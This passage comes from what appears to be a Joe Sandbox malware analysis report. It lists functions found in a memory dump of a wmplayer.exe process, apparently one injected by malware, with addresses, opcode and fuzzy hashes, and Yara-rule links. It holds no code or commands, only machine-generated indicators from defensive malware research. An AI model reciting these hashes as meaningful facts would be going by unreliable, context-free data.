                                              • Opcode ID: 3ce87fa506e0d57c4aefe5222e712ebb8534e6fbab3f0d6e40c8a78e7a78c0b2
                                              • Instruction ID: 364ab3068add7464a7c39cf38cbfb1104b0c57021180128c868d762aad856e18
                                              • Opcode Fuzzy Hash: 3ce87fa506e0d57c4aefe5222e712ebb8534e6fbab3f0d6e40c8a78e7a78c0b2
                                              • Instruction Fuzzy Hash: 97F0E538251B84CFE71ADF09C1E1F6173BDFB55B40F554458E8868BBA1C73AA942CB40
                                              Function 032D2050 Relevance: .0, Instructions: 20COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3738c783209826cecb5136e091b1fdc4dcef87ce4eff65fd19bfd0fb6b711604
                                              • Instruction ID: aa2d16ad33cbc9eb7a4ec392d267765e5b767310b09403182377b80ff29093d9
                                              • Opcode Fuzzy Hash: 3738c783209826cecb5136e091b1fdc4dcef87ce4eff65fd19bfd0fb6b711604
                                              • Instruction Fuzzy Hash: 2EE08C32220660ABC611FA5EDD41E9A739EEF94260F044221F1518B294CAA0AC80C794
                                              Function 032CA0E3 Relevance: .0, Instructions: 15COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                              • Instruction ID: 285e69e75ae6f736d4aeadbe83fb0adcfe97dcd16c21fd16aa782809d4c225d2
                                              • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                              • Instruction Fuzzy Hash: B0D022323320B093CF28D6506C00F63A9059B80AA0F0A016C740BA3800C0058CC2C2E0
                                              Function 0335930B Relevance: .0, Instructions: 12COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                              • Instruction ID: 649cb712d0abe94b7b771087e325be3e1244d757192216473f4174a605948201
                                              • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                              • Instruction Fuzzy Hash: 8BD01735941AC4CFE727CB08C1A5F507BF8F705B40F890098E4424BAA2C37C9984CB00
                                              Function 0330C700 Relevance: .0, Instructions: 12COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                              • Instruction ID: b2224d80d26b97eadee7f91975bf7556b1e781fb2760446a0bed7ddf9a967f6f
                                              • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                              • Instruction Fuzzy Hash: C5C08037250744AFC711DF94CD01F0177A9E798B40F400061F3054B570C571FC50D644
                                              Function 032F0310 Relevance: .0, Instructions: 11COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                              • Instruction ID: 71550a6777ba77b16198bcff364ba471d071515438b5a7539879a05317e401bb
                                              • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                              • Instruction Fuzzy Hash: EFD01236110248EFCB01DF41C890D9AB72AFBC8710F108019FD190B6118A71ED62DB50
                                              Function 032D0750 Relevance: .0, Instructions: 9COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                              • Instruction ID: cd9bbfffe77a3af0312e816a7ae9f6d850ec49b4d07bed045d9936373efd632b
                                              • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                              • Instruction Fuzzy Hash: 1CC08838300A008FCF00CBAAC2C0F083BE8FB00300F0808C0E808CBB20E220E800CA00
                                              Function 03314340 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f8740ed36e3d4cc9374b613ae55f5fcb9d9932ae8d5263bddc793f5edf31e76f
                                              • Instruction ID: cacb3a2d6971d7d602ee6498eac08f928dd37c21bc57b5e121d10a9fb73f1f05
                                              • Opcode Fuzzy Hash: f8740ed36e3d4cc9374b613ae55f5fcb9d9932ae8d5263bddc793f5edf31e76f
                                              • Instruction Fuzzy Hash: CE900235615814129140B15C48C5546440597E0301B56C011E0424954C8F148A565361
                                              Function 03313010 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 025268a60168a840801245cb9430976c21cd9d5b09ec97199e97fe5f27b25f1c
                                              • Instruction ID: d70eebfc99638ac941024b3300689970a063616e2e14cf299db78c8f028f9f81
                                              • Opcode Fuzzy Hash: 025268a60168a840801245cb9430976c21cd9d5b09ec97199e97fe5f27b25f1c
                                              • Instruction Fuzzy Hash: 1090023521185842D140B25C4845B0F450587E1202F96C019A4156954CCE1589555721
                                              Function 03313090 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aeb3614a1cdd279c4404506726a4fda1469cbef9a11856e94872b858ed3a075c
                                              • Instruction ID: 0959585b65f82e26b4830db11d62004b7b459dc5b3405ed4b39cc971ccf762f1
                                              • Opcode Fuzzy Hash: aeb3614a1cdd279c4404506726a4fda1469cbef9a11856e94872b858ed3a075c
                                              • Instruction Fuzzy Hash: 1E90023525141C02D140B15C84557070406C7D0601F56C011A0024954D8B168A6566B1
                                              Function 03314650 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b5d5da830a7cb41ab512a7af90b765d43ee0d1169f17e1f41bfb8c5d57d15e37
                                              • Instruction ID: 5aab78df47d1f7c892874cf71f1dd31524fb72d0a616ae164e7214f4945f7927
                                              • Opcode Fuzzy Hash: b5d5da830a7cb41ab512a7af90b765d43ee0d1169f17e1f41bfb8c5d57d15e37
                                              • Instruction Fuzzy Hash: D1900275611514424140B15C4845406640597E1301396C115A0554960C8B1889559269
                                              Function 03312BA0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 59037eaa038fce6efcff13d1555dfc6e5ab8873aaabb16d5e732d7487d2bf0d0
                                              • Instruction ID: 1fbb8be8e778b457d44d1c8d3d6cd84b3ed0c5834132f5844b9989badc6ee3dd
                                              • Opcode Fuzzy Hash: 59037eaa038fce6efcff13d1555dfc6e5ab8873aaabb16d5e732d7487d2bf0d0
                                              • Instruction Fuzzy Hash: E890023561541C02D150B15C4455746040587D0301F56C011A0024A54D8B558B5576A1
                                              Function 03312B80 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b450ca2230ea93777d22854101abcf50288eb4eaf0756ccf9746dbd8fabaaa54
                                              • Instruction ID: 47ba370d07fb8a18453be9bd45b5e7e86a50b9a67b5a32e43f8e12ffffea8eb8
                                              • Opcode Fuzzy Hash: b450ca2230ea93777d22854101abcf50288eb4eaf0756ccf9746dbd8fabaaa54
                                              • Instruction Fuzzy Hash: 4E90023521141C02D104B15C4845686040587D0301F56C011A6024A55E9B6589917131
                                              Function 03312BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ee228ec9146e9441fc8a147a2b0fb596f95c8de79192e4a4eb18ab043d95342a
                                              • Instruction ID: 07f9943035e9b35914a95ba6b4be8bb18306fab53403f75bcecc72ba58fa70d1
                                              • Opcode Fuzzy Hash: ee228ec9146e9441fc8a147a2b0fb596f95c8de79192e4a4eb18ab043d95342a
                                              • Instruction Fuzzy Hash: 2890023521141C02D180B15C444564A040587D1301F96C015A0025A54DCF158B5977A1
                                              Function 03312BE0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 43106fb4deecc0f6b104bff2a908478990c49e6a11be3f7442e475f803c428f3
                                              • Instruction ID: 5323d3d3611566766d352518f14a16bb43d1dc640be581498898e671763fcfbd
                                              • Opcode Fuzzy Hash: 43106fb4deecc0f6b104bff2a908478990c49e6a11be3f7442e475f803c428f3
                                              • Instruction Fuzzy Hash: B790023521545C42D140B15C4445A46041587D0305F56C011A0064A94D9B258E55B661
                                              Function 03312AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 251712ae17a6457c9862de028a21209a2fb7cd76e226b2a0f0aa1d7c42d43543
                                              • Instruction ID: 9113934d7dd8c5f05c31c48faffd56eb4cd66fc403a2d7ca4e17ff1281241abd
                                              • Opcode Fuzzy Hash: 251712ae17a6457c9862de028a21209a2fb7cd76e226b2a0f0aa1d7c42d43543
                                              • Instruction Fuzzy Hash: 8C9002B5211554924500F25C8445B0A490587E0201B56C016E1054960CCA2589519135
                                              Function 03312AF0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b5f6762b73babdfc88b8280ccc1605248b2b690458ce670918c9d8490975a875
                                              • Instruction ID: 9f98ed4b504059c3288bbea596833bb278b4fcae58219c454ac8f3a64a5dffb2
                                              • Opcode Fuzzy Hash: b5f6762b73babdfc88b8280ccc1605248b2b690458ce670918c9d8490975a875
                                              • Instruction Fuzzy Hash: 56900239231414020145F55C064550B084597D6351396C015F1416990CCB2189655321
                                              Function 03312AD0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6b2ad22898d3269c36e9885ec470fbf2361d049ac1016c0722a947a9187feafb
                                              • Instruction ID: 86913322b0ad6cf8d20ddf84fdd9d06fb646f606b614f87249da00a7c597b5f9
                                              • Opcode Fuzzy Hash: 6b2ad22898d3269c36e9885ec470fbf2361d049ac1016c0722a947a9187feafb
                                              • Instruction Fuzzy Hash: 4390043D331414030105F55C07455070447C7D5351357C031F1015D50CDF31CD715131
                                              Function 033139B0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 60ec4028395ac0af52e1c247c1f60d60d8c059a54ddc35ca7b78252e2a349173
                                              • Instruction ID: 43ba17a77a73e7cd553d400d87890cf4c874ebee9e660a1c8efc821d77b060da
                                              • Opcode Fuzzy Hash: 60ec4028395ac0af52e1c247c1f60d60d8c059a54ddc35ca7b78252e2a349173
                                              • Instruction Fuzzy Hash: 4790023525546502D150B15C44456164405A7E0201F56C021A0814994D8A5589556221
                                              Function 03312F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 221655de1f09acba118c3efc902179301a41cf06bd7a56ba05dcf71ef7350d76
                                              • Instruction ID: eb6cdf516bef35e4d12f0c370fab0d95f5bbebb96d439e3b7b1b39fd47ef1986
                                              • Opcode Fuzzy Hash: 221655de1f09acba118c3efc902179301a41cf06bd7a56ba05dcf71ef7350d76
                                              • Instruction Fuzzy Hash: 5290027535141842D100B15C4455B060405C7E1301F56C015E1064954D8B19CD526126
                                              Function 03312F60 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 20a1d734fa15551254753200badd04dff0b3e622f3372edb0a98ce962397d213
                                              • Instruction ID: 212d52731fae866f04771dbac88758b33e816cd91bfc23418c42e00c1a8c0939
                                              • Opcode Fuzzy Hash: 20a1d734fa15551254753200badd04dff0b3e622f3372edb0a98ce962397d213
                                              • Instruction Fuzzy Hash: 1B90027522141442D104B15C4445706044587E1201F56C012A2154954CCA298D615125
                                              Function 03312FB0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4a4cb86221f858ec2955b7045a3c61da6b689261b5018f8f1a717e529d103848
                                              • Instruction ID: bd28c1a482a035f7e22f63329873be7a52702b17f795b92bbd45138d88d87421
                                              • Opcode Fuzzy Hash: 4a4cb86221f858ec2955b7045a3c61da6b689261b5018f8f1a717e529d103848
                                              • Instruction Fuzzy Hash: 3A900235611414424140B16C88859064405ABE1211756C121A0998950D8A5989655665
                                              Function 03312FA0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c1ea86f3299e5c2a64d78de8688b08e0b1c702d08b02d4d6b0faeb75d365713f
                                              • Instruction ID: 183fef07ad099a3300d7fd3b62dcbbd2951a0998a897295682b4588d5ae0826b
                                              • Opcode Fuzzy Hash: c1ea86f3299e5c2a64d78de8688b08e0b1c702d08b02d4d6b0faeb75d365713f
                                              • Instruction Fuzzy Hash: 3190023521181802D100B15C4849747040587D0302F56C011A5164955E8B65C9916531
                                              Function 03312F90 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 32a7cc7b78b1684580402eac76b5057e3a31343fb50c20631f674f99966d8093
                                              • Instruction ID: 6cb8964495f0ca47f13d4b102b71bdb7dc0f12e1dd31349dafc852269ca226ae
                                              • Opcode Fuzzy Hash: 32a7cc7b78b1684580402eac76b5057e3a31343fb50c20631f674f99966d8093
                                              • Instruction Fuzzy Hash: 4190023521181802D100B15C485570B040587D0302F56C011A1164955D8B2589516571
                                              Function 03312FE0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0330ccb389223d289f52bd3c35f2f2218d961e2f26fc7c74fccb2b17f00dea96
                                              • Instruction ID: 9671d3d64cce8fff9e3e627f9d31a5172e19d0350285a4a2d2acb5b97a3bddcd
                                              • Opcode Fuzzy Hash: 0330ccb389223d289f52bd3c35f2f2218d961e2f26fc7c74fccb2b17f00dea96
                                              • Instruction Fuzzy Hash: A5900235221C1442D200B56C4C55B07040587D0303F56C115A0154954CCE1589615521
                                              Function 03312E30 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3eeb6faf66d8e9aa6229d2b8e02342343e4783bf2f3973ce900daf3d0eaba965
                                              • Instruction ID: 125aaa3b9104086c9d5e6f7925abbee8ecd6bf92138632639403f4c7685d039b
                                              • Opcode Fuzzy Hash: 3eeb6faf66d8e9aa6229d2b8e02342343e4783bf2f3973ce900daf3d0eaba965
                                              • Instruction Fuzzy Hash: DD90023531141802D102B15C44556060409C7D1345F96C012E1424955D8B258A53A132
                                              Function 03312EA0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 91e24979d84bd037c0f58a9e537af5c2259f1cde3413e4ff050b7a7edf3cca63
                                              • Instruction ID: d3b472b6c9c7b0521630e244e013eeea91046b92334f57074eb8302f3418ca7b
                                              • Opcode Fuzzy Hash: 91e24979d84bd037c0f58a9e537af5c2259f1cde3413e4ff050b7a7edf3cca63
                                              • Instruction Fuzzy Hash: 7F90027521141802D140B15C4445746040587D0301F56C011A5064954E8B598ED56665
                                              Function 03312E80 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e1562bcf6cec9d59d94fcd37a554d90c6dfbea74fde78e94573c5a47d49b5ec0
                                              • Instruction ID: 737c9ca3277cefa2cd2515a9d4e551f46fcf9f2546fee13ea010953e862523ad
                                              • Opcode Fuzzy Hash: e1562bcf6cec9d59d94fcd37a554d90c6dfbea74fde78e94573c5a47d49b5ec0
                                              • Instruction Fuzzy Hash: E890023561141902D101B15C4445616040A87D0241F96C022A1024955ECF258A92A131
                                              Function 03312EE0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 39e66835421c1b687a5881981f2fd503fd1cac8aabd84b76abb6248afe4e1b3a
                                              • Instruction ID: 41388ccd504e12a90e947453128b2d752e8d74f0b3194d6674c94da3d8653c48
                                              • Opcode Fuzzy Hash: 39e66835421c1b687a5881981f2fd503fd1cac8aabd84b76abb6248afe4e1b3a
                                              • Instruction Fuzzy Hash: 2790027521181803D140B55C4845607040587D0302F56C011A2064955E8F298D516135
                                              Function 03312D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d94faf678a2b2cb4c9de322ac32f6e79f2136fddcb1780038dd9eb57a4bf042a
                                              • Instruction ID: f2a2c043ca26ccb45a5041e19122dd3115c12bf4371d86bd3e09c378c02b19bf
                                              • Opcode Fuzzy Hash: d94faf678a2b2cb4c9de322ac32f6e79f2136fddcb1780038dd9eb57a4bf042a
                                              • Instruction Fuzzy Hash: 0F90043531141403D140F15C545D7074405D7F1301F57D011F0414D54CDF15CD575333
                                              Function 03312D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 39887c02c5147c8d03a163e12f3fe0823d4d7e885154e45b3672891eb83dd31b
                                              • Instruction ID: 0fe66ddc0f27f523cda0508b4b78217e9ab524c092f550b6e1ee299a59386216
                                              • Opcode Fuzzy Hash: 39887c02c5147c8d03a163e12f3fe0823d4d7e885154e45b3672891eb83dd31b
                                              • Instruction Fuzzy Hash: 9690023D22341402D180B15C544960A040587D1202F96D415A0015958CCE1589695321
                                              Function 03313D10 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4388ecbfb90a81e77b7aa4a0f9dc3981e01b2d9763d9abff44ad6db16d1e5c69
                                              • Instruction ID: 5c4e297a65d6bee2d9e8815a1d7280da2213b444aac5faf83ec3f21ae3954dd4
                                              • Opcode Fuzzy Hash: 4388ecbfb90a81e77b7aa4a0f9dc3981e01b2d9763d9abff44ad6db16d1e5c69
                                              • Instruction Fuzzy Hash: 4F900235212415429540B25C5845A4E450587E1302B96D415A0015954CCE1489615221
                                              Function 03312D00 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b5f464677ac3437d7f898e2245f1a0838e362cbc5ecda2477535622c280b3c85
                                              • Instruction ID: 381d893b76b3cfacdd11e2f2d77f5968e4d1422717f5f625457734703c2b1c50
                                              • Opcode Fuzzy Hash: b5f464677ac3437d7f898e2245f1a0838e362cbc5ecda2477535622c280b3c85
                                              • Instruction Fuzzy Hash: 0B90023521545842D100B55C5449A06040587D0205F56D011A1064995DCB358951A131
                                              Function 03313D70 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a4235273ba2b99fc6ed22e667a52564469b124d600899c39e745e17734f09eed
                                              • Instruction ID: eff851bfb7cd4334e4e8b36059c50f6f20f97ea5c039ec786f1f418f0e0a333a
                                              • Opcode Fuzzy Hash: a4235273ba2b99fc6ed22e667a52564469b124d600899c39e745e17734f09eed
                                              • Instruction Fuzzy Hash: CC90023921141802D510B15C5845646044687D0301F56D411A0424958D8B5489A1A121
                                              Function 03312DB0 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
